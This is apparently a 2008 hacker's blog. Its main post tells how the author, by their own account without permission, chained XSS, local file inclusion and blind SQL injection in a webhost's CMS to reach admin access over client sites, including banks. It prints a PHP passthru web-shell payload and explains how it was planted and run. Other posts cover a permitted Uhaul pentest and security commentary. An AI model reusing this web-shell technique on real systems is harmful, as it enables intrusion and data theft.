Monday, November 24, 2008

Hacking Banks

Alright, sorry to get everyone excited, but this is not a guide on how to hack banks. This is how I got access to a couple of banks via getting into a webhost company located locally. The name is not shown to protect the innocent hosts on this webserver. Everything has been reported and most of it has been fixed.

Seeing as I'm looking for a job, someone I know showed me this ad placed by a local webhosting company looking for web scripters. I am not new to html (or xhtml as is getting more standardized) nor PHP, so I decided to look around at its site. They basically wrote a CMS system to create pages easily and quickly (which is why CSS was not a need to know). Curious as to how this worked, I decided to throw some information at it and see what I got in return.

This is where the exploiting came in. I found out how easy it was to get this system to return information to me that would be extremely valuable to a would-be attacker. This included finding out that none of the scripts checked for script insertion. So, there were several low-level XSS finds and one even more dangerous one found. They had a contact us form that submits and writes the information to an online file that can only be accessed by the admin. Unfortunately, this script also did not check for any kind of script insertion. So I could send whatever html I felt like (and even PHP, but we'll get to that later) to the admin. Next I found that as long as I attached .*** to the suffix (no null byte here and could not create an RFI due to some restrictions) anything local could be included through a variable I had access to. So, I decided to do a little proof of concept and had the page include itself over and over again (included file through an infinite loop would create an internal DoS).

Next, I found a blind sql injection. After mapping my way through 150 (there were more tables, but I just had to stop and do something else after 150 tables) tables I took the interesting ones and started to map out their column name(s). I had all sorts of information I could access through this. There was client information (automated payment information anybody :p), banking information, financial records, and etc. What caught my eye was the ever so common table name, users. After a little work from empty columns to a WHERE clause pulling information by an identification number, I was able to extract unencrypted passwords from the table. This is where I pulled the first working id from the table and logged in as administrator in their back-end administration system. I had access to practically everything this webhosting company was doing. This included access to the hundreds of client sites, a couple of which were banks (see title). With these clients I had their passwords and could see, upload, and modify each hosts' content. I also had access to that contact form (see last paragraph).
The best part of it was I was playing around loading files with the MySQL (this was the sql database they used) load_file() function and was loading files outside of the website root. When I went into the admin panel they had little notes on what needed to be done and updating their sql database to a newer version was in their todo list (upgrading would have stopped me from being able to issue the load_file() function unless they really messed up and let a visitor run sql commands with enough rights to run such powerful functions).

Now, on to the part where I gain access to the box. I could simply write a simple php shell and place it on one of the pages with the longer number of used lines (so it would be more stealthy than just uploading a file), but I had LFI access to an XSS'able page. So there's something I wanted to try for a long time, using the XSS'ed page to include a php script that could get executed by the LFI vulnerability. So I wrote a nice comment and submitted it to them:
"><?php passthru($_POST['***__file']); ?>
Note - ***__file, ***_file is the include function variable, so I just placed another underscore on my simple shell to make it look less suspicious. I also included an isset() that would check to see if my post was submitted and then echo'ed the results back to me. All of this being encoded by base64_encode.
Next, I loaded the page this was wrote to through the LFI (which was happy to accept another variable called blah=.iml) and started to play with my working shell.

Friday, November 21, 2008

We Need to be More Like Cyber Terrorists

Recently Obama had his cell phone "breached". What had happened was a couple of people working at Verizon Wireless got his number and looked at the logs of his cellphone. This got them a good amount of information like numbers he called, when he called them, and etc. This is something that is hard to prevent against (who is watching the watchers?) but not impossible. Sure, the people who did this were found, but at what cost and how long had they had this kind of access? They could have easily sold this information, or simply given it out to anyone. That is a hard price to pay when we are talking about the president of the united states!
What I want to know is what the CIA/FBI/NSA is going to do about this. People being able to look at the presidents phone log is likely to be a threat to national security. Certain branches of the government have a division for cyber terrorism and I am sure they come across phreaking and phreakers, otherwise this division would not be very good. These divisions have to be able to know what they can and can not track (or at least what is hard to track). Why can we not use this information to our advantage? Why does the president only go through one number when he makes calls and not multiple numbers? Hell, even better, why not set up an Asterix (or some other VoIP) server and modify it?
We need to get the ball going, the government has been showing more and more signs of them just not being ready for the future or security (no wonder the Chinese, or so called, have been getting into government systems). With both candidates campaign servers being owned, Obamas phone logs being read, a barber who ran an automated tool that checks Windows computer for Administrator with blank password and then accessing a couple hundred government computers, and etc. the government needs to get with it and step up their security game.

First Official Pentest - Uhaul

To just view how Uhaul got hacked in a rather ironic way, please skip past the next paragraph.

What reason did I have to look at Uhaul? Well, in college I had a base security class. In this class was someone who worked in security for Uhaul International. Upon hearing this I decided to check out Uhaul and see what I could find. After about two minutes of playing I managed to get an error from one of their login forms. The Uhaul guy was watching and was rather interested in seeing what else I could find, seemingly confident of their security. So, with his peeked interest, I got permission to pentest Uhaul International (as long as I did not mess up functionality).

My first step was to map out everything on the server, to see all of my points of entry. Cross-server exploit protection is not very great at the moment and can be bypassed depending on the situation. Also, WAP products do not do anything for cross-server exploits (that I am currently aware of). Now, I managed to map out just a few domains on the same ip and several sub-domains (thanks to the source and Google command, site:). After checking out the other domains, I noticed there was not a whole lot of dynamic content going on with these other domains. I looked around for a while, but did not find anything that could really be used to my advantage. So, I moved on to my main target,

After a bit of looking, I found something that could be interesting for me to toy with. This was a private forum system made specifically for Uhaul (or possibly made by Uhaul staff). I took a look around this and managed to find some holes in the implementation. This was a CSRF vulnerability that I could place in my avatar and execute on anyone looking at my post (PoC was a very annoying logout avatar). I also used my own exploit that has not been discovered by the public yet to make the paper look good. This exploit basically redirects users to my own page (no cookie stealer, best use would be for stealing competitor traffic and spreading spam) because of my off-site avatar.

After I extensively ran through how the forum worked and what I could do with it, I decided to look a bit further at some of the other sub-domains. Some of them had 301 redirects (the source on this info was rather revealing when I saw it) and others had nice fake error messages. Now, as I was looking around I was not finding very much. Just a simple low-level XSS on one of the sub-domain login pages. This was until I started looking at the servers. Now, all of the domains/sub-domains had the newest IIS server running, all except one. This is where the ironic part of this story comes in, the old IIS server was none other than Let me just say that the version was rather old and had code execution and we could view the source of any file. I proved two proofs of concepts that could take down Uhaul (internal DoS) and could view special files that happened to be on their server (LFI in a way).

I figured that because this was a couple month old pentest, it would not be a problem to publish this as everything has been reported and fixed properly (I wrote a report with both how to exploit and fix the exploits). I am even receiving a document that states I had helped Uhaul with security and it will be signed by the head of IT.
There were a lot more steps taken including looking at the other services (even those just Listening internally), but I only wrote here about the things I was able to find and exploit. I just wish they would have implemented my SSL recommendations, but you can not have everything I guess.

Thursday, November 20, 2008

I'm Up!

Hello everyone...again!
I've been out of the public's eye for quit a while with my work/research. Today I've decided to start a blog and share with everyone some of the information I'm allowed to release publicly.